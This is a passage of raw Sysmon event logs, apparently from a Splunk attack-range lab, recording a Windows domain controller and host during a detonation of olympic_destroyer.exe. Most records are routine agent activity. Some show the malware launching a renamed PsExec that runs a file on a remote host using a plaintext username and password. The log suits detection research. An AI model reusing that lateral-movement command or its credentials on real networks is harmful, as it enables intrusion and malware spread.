Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000295782Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:21.669{C8EA50B7-15A5-6216-D606-000000003802}7108C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000295781Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:21.468{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EF520C3D872FE3465D4A490591EA5C3,SHA256=66C1D5AE41A272D6EFAF1787C06C71C9D3D00C6B7C8DBFD28703C88128CF20EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219914Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:21.613{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9F7046DE1DCCDD5014B66A62B022990,SHA256=033EEC0AA643DA0E431B68FD3EFC2CEA5A989012F61FB3D2D602119AD21A3C49,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295780Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:18.537{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49274-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000295779Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:21.151{C8EA50B7-15A4-6216-D506-000000003802}19726808C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000219916Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:20.064{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx53905-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219915Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:22.629{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0129DA0A08A33CE6B43C3D056D83E7F9,SHA256=244A2547D2B2232272D92366D79CB8D350ABB6488E40CE7AD293B3F2F2083173,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295792Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:22.667{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=FB4B9CA6614C2DF1B53E5327C53D285B,SHA256=75EBA0D295A646537C8A74E101D0B22D6ED0E0C71802DD6E46122AC1FDEDA8F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295791Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:22.667{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=298BB085677D6A8360F6C52CFD007FFA,SHA256=CCB1742E6EDDF47D46ED610706439FC989C0D28B5D9A9A14C0B284980D5C49AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295790Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:22.483{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DE456526B16D7D62CC0C994805FA53D,SHA256=434210CE0102BAAED4D1FE3CC40CD9F2F74D21335C01BE1E713C851A66E0C991,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219918Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:23.660{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B037A01396BB1BB76742AEDC13A69443,SHA256=A900902E6500C467D5EB461BD90E00F22F5A7E0BE5DF9EC3E81B5E252576452E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219917Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:23.644{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D187B3857EF8F04773A5A1184F2977C9,SHA256=ED126C8737C4F669CF401C82DE1BAA99E4D7D1F20E7C2E8668506B8FCAC1B07E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295803Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:23.798{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-15A7-6216-D806-000000003802}884C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295802Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:23.798{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-15A7-6216-D806-000000003802}884C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295801Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:23.651{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-15A7-6216-D706-000000003802}6632C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295800Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:23.651{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295799Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:23.651{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295798Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:23.651{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295797Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:23.651{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295796Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:23.651{C8EA50B7-12E6-6216-4B05-000000003802}67924840C:\Temp\olympic_destroyer.exe{C8EA50B7-15A7-6216-D706-000000003802}6632C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000295795Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:23.653{C8EA50B7-15A7-6216-D706-000000003802}6632C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-1.eu-central-1.compute.internal -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000295794Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:23.651{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-15A7-6216-D706-000000003802}6632C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000295793Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:23.514{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=817FCE672C8F9FB93AC4D18A6894C51B,SHA256=6ED5A4C9B1492116EB78E4A08421FE5F3C7813D1363975273BAC334509AE1F66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295809Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:24.652{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=FB4B9CA6614C2DF1B53E5327C53D285B,SHA256=75EBA0D295A646537C8A74E101D0B22D6ED0E0C71802DD6E46122AC1FDEDA8F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295808Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:24.515{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB18CCAF640FE5AABD242D13C80303DA,SHA256=095B8C6A0CD5D56FBEA9945E13F3FFB0E2B292E503479A55DD545CD1C2FEE5FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219920Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:24.675{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1177DB04EE65FE37ED38A1A462A6EC0B,SHA256=97864B02D4543861FF17C4DE7E9DAC3E65183DB0959A81C114DEDF0E49290FF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219919Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:24.256{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-151MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000295807Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 11:08:24.099{C8EA50B7-15A7-6216-D706-000000003802}6632C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000295806Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:23.935{C8EA50B7-F11F-6215-1000-000000003802}364764C:\Windows\system32\svchost.exe{C8EA50B7-15A7-6216-D806-000000003802}884C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295805Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:23.935{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-15A7-6216-D806-000000003802}884C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295804Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:23.867{C8EA50B7-15A7-6216-D806-000000003802}8846852C:\Windows\system32\conhost.exe{C8EA50B7-15A7-6216-D706-000000003802}6632C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000295810Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:25.534{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80B56F265D08093132B5AEBF2A6A050E,SHA256=F63820117348B791D28F7C97070E17EB46ED80321C27D922D694B7A6E7396465,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219923Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:22.673{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51548-false10.0.1.12-8000- 23542300x8000000000000000219922Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:25.690{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D617EED1D45647EB94E71EBD017DDF00,SHA256=7D2063DD0855F96CA1E32A8AB50895151372A881F4968E190D99AECAEA0EB06C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219921Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:25.270{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-152MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219924Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:26.691{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCAA821EC53C7EFAA39AB6825953AFF3,SHA256=58ED565A793F7549C8B8009E9D23074E33962C9E375CEB46167378BA51BF83BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295812Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:26.551{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CA105BBEFB350E8F6B1443A6F272AEF,SHA256=B48798318C659F49349DD6B9B0035F83BFAE7661BA55E9B08A3DF73813375042,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295811Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:23.648{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49276-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000219925Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:27.707{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CE637BA60F4D098707E688DFC00EA35,SHA256=120B5393C6ED18B022F7A41B1A6727200FBCD47E79E44FE5635C962B696EF947,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295814Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:27.566{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=156F514AB180EDE67B0795B8336CF65A,SHA256=F488917873241B0F1514745E811F03DE499C2F2EFE7E5B5D6D4DA46A1B13B832,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295813Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:24.842{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local52053- 23542300x8000000000000000295815Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:28.581{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F2BD925463480C3767B93A8A77F3841,SHA256=942708AA192C5893690E0596FBE65ADBA35EDD357DA4181157313A9C68CA49CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219926Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:28.722{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 